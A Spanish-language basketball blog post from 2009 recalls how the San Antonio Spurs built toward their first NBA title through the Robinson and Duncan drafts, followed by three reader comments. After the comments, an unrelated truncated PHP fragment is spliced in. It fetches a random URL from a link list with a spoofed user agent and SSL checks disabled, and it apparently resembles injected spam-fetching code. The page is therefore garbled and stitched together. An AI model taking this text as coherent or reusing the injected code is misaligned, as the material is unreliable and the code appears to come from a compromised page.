A 10 años del primer título de San Antonio

30 de April de 2009 por jacolomes

El equipo tejano nos enseña que vale la pena esperar. Sus números lo avalan y a pesar de que esperar cuesta -este año sin Ginóbili no habrá paraíso- los Spurs han demostrado que la paciencia es la madre del éxito.

En 1999 San Antonio ganó su primer anillo de la NBA pero todo empezó a gestarse en 1987. En aquel entonces seleccionaron en primera ronda del draft a David Robinson aún sabiendo que el pívot no podría incorporse hasta 2 años más tarde al estar enrolado la Marina. Las palabras del GM Bob Bass (“Hemos esperado 14 años. Podemos esperar un par más“) resultaron proféticas.

Y esperaron. Esperaron a un jugador con muchos años por delante y un físico espectacular, y finalmente, 10 años antes del primer título, llegó a la liga “el almirante”. No tardó en ganarse el respeto de todo el mundo con su profesionalidad y buen hacer. Los números cantaban. Era un pivot dominante. Llevó a los Spurs a sus cotas más altas hasta el momento en liga regular pero a pesar de tener a su lado a magníficos compañeros (Dennis Rodman, Sean Elliot, Vinny del Negro, Avery Johnson, Mario Ellie…), los títulos no llegaban… y las finales de la NBA tampoco.

Dicen que no hay mal que por bien no venga y una inoportuna lesión dejó fuera a David Robinson buena parte de la campaña 1996-1997. Además aquel año un hombre de origen serbio y muy serio (Greg Popovich) asaltaba el banquillo desde los despachos. Producto de su mala campaña el equipo pudo elegir al número 1 del draft, escogiendo a Tim Duncan, de la universidad de Wake Forest. Otro prodigio.

Rápidamente, la pareja Duncan-Robinson (las torres gemelas) se hizo dueña y señora de las zonas de la liga y el premio llegó finalmente en la campaña 1998/1999 (la del cierre patronal o lockout). Gracias a los dos, San Antonio logró su primer título venciendo en la final a los New York Knicks.

San Antonio Spurs, por tanto, se enfrentó a dos grandes decisiones: esperar 2 años a David Robinson y aguantar una temporada humillante como la 1996-1997. Decidieron esperar en ambos casos y esperar, si es con sentido, da fruto, y en San Antonio, muchos.

Con Ginóbili lesionado, los Spurs no han tenido este año la oportunidad de luchar por el anillo con garantías y deberán esperar a un mejor oportunidad. Pero esperar… siempre les ha dado resultado.

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Recuerdo aquel año sin Robinson. Qué pena daban los Spurs. Nique Wilkins gordo, con 30-y-muchos, y de vuelta de su temporada en Grecia con el PAO, era la estrella. Junto a él estaban Elliot, Del Negro, Vernon Maxwell, Avery Johnson, Carl Herrera…

    Sí, aquel año tan penoso fue la clave de éxitos posteriores.

      Citar

  2. BigBen dice:
    #2

    Que recuerdos¡¡¡
    Por aquella epoca empezaba yo a ver la NBA…y todavia me acuerdo de aquel juego racano que gano el anillo, ademas, contra uno de los equipos que en aquel tiempo me gustaban: los Knicks de Sprewell, Houston, Ewing, Johnson, un joven Camby…

    Este año ha quedado demostrado que el salto de calidad en este equipo lo da el argentino, y que Parker y Duncan son muy buenos, pero TD21 ya no domina tanto, y las actuaciones de Parker tienen que ser exageradamente geniales para ganar un partido. De todas maneras, los secundarios (Mason, Gooden, Finley, Hill…) no han rendido como se esperaba.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues se habló mucho de porqué perdieron tantos partidos la temporada del Draft de Duncan.
    Los Spurs siempre buscando los límites a la moralidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>